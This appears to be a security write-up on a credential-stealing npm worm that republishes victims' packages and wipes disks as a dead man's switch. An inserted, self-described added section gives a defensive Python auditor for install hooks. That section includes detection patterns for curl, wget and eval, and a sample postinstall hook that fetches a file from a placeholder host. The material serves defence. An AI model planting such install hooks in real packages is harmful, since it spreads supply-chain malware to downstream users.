Dead Man’s Switch – Widespread npm Supply Chain Attack Driving Malware Attacks
GitLab’s Vulnerability Research team has uncovered a large-scale supply chain attack spreading a destructive malware variant through the npm ecosystem.
Once running, the malware aggressively harvests credentials from multiple sources, including GitHub tokens, npm authentication keys, and accounts for AWS, Google Cloud, and Microsoft Azure.
Using stolen npm tokens, the malware automatically infects all other packages maintained by the victim. It modifies the package.json files to include malicious scripts, increments version numbers, and republishes everything to npm. This worm-like behavior means the attack spreads exponentially across the ecosystem.
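The propagation step described above hinges on injected `package.json` scripts, which npm runs automatically during installation. The following added example is not code from the article or from GitLab; it is a defender-side audit script that walks a checkout or `node_modules` tree, parses every `package.json`, and reports any install-time lifecycle hook (`preinstall`, `install`, `postinstall`, `prepare`), flagging bodies that match a few constructed heuristics (remote downloads, base64 decoding, executing a bundled `.js` file, `eval`). The heuristics and the two sample manifests are assumptions made for this example, not indicators published for this campaign.

```python
import json
import re
from pathlib import Path

# Lifecycle hooks npm executes automatically on `npm install`; a worm that
# republishes a package with an injected script typically hooks one of these.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed review heuristics (assumptions for this example, not IoCs from
# the article): remote fetch, blob decoding, running a bundled file, eval.
SUSPICIOUS = [
    re.compile(r"\b(curl|wget)\b"),
    re.compile(r"base64"),
    re.compile(r"\bnode\s+\S+\.js\b"),
    re.compile(r"\beval\b"),
]


def audit_package_json(text: str, path: str = "package.json") -> list[dict]:
    """Return one finding per install-time hook found in a package.json body."""
    findings = []
    try:
        data = json.loads(text)
    except json.JSONDecodeError as exc:
        # An unparseable manifest is itself worth a look.
        return [{"path": path, "hook": None, "script": None,
                 "reason": f"unparseable manifest: {exc}"}]
    scripts = data.get("scripts") or {}
    if not isinstance(scripts, dict):
        return findings
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        reasons = [p.pattern for p in SUSPICIOUS if p.search(cmd)]
        findings.append({
            "path": path,
            "hook": hook,
            "script": cmd,
            # Any install hook is reported; matched heuristics sharpen the reason.
            "reason": ", ".join(reasons) if reasons else "install-time hook present",
        })
    return findings


def audit_tree(root) -> list[dict]:
    """Recursively audit every package.json under root (e.g. a node_modules dir)."""
    findings = []
    for pj in Path(root).rglob("package.json"):
        body = pj.read_text(encoding="utf-8", errors="replace")
        findings.extend(audit_package_json(body, str(pj)))
    return findings


# Constructed sample manifests so the script runs stand-alone and offline.
CLEAN = json.dumps({
    "name": "example-lib", "version": "1.2.3",
    "scripts": {"test": "jest"},
})
HOOKED = json.dumps({
    "name": "example-lib", "version": "1.2.4",  # version bump plus a new hook
    "scripts": {"test": "jest",
                "postinstall": "node bundle.js && curl -so /tmp/x https://example.invalid/x"},
})

if __name__ == "__main__":
    for finding in (audit_package_json(CLEAN, "clean/package.json")
                    + audit_package_json(HOOKED, "hooked/package.json")):
        print(finding)
```

Run `audit_tree("node_modules")` after a fresh install to get a single list of every package that will execute code at install time; in a CI pipeline, a non-empty list for a dependency that had no hook in the previous lockfile is the kind of change worth blocking pending review.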
Most critically, the malware includes a destructive payload designed to protect the attack’s infrastructure. If an infected system simultaneously loses access to both GitHub and npm, it triggers immediate data destruction. On Windows systems, the malware attempts to delete all user files and overwrite disk sectors. On Linux and macOS systems, it uses advanced wiping techniques to make file recovery impossible.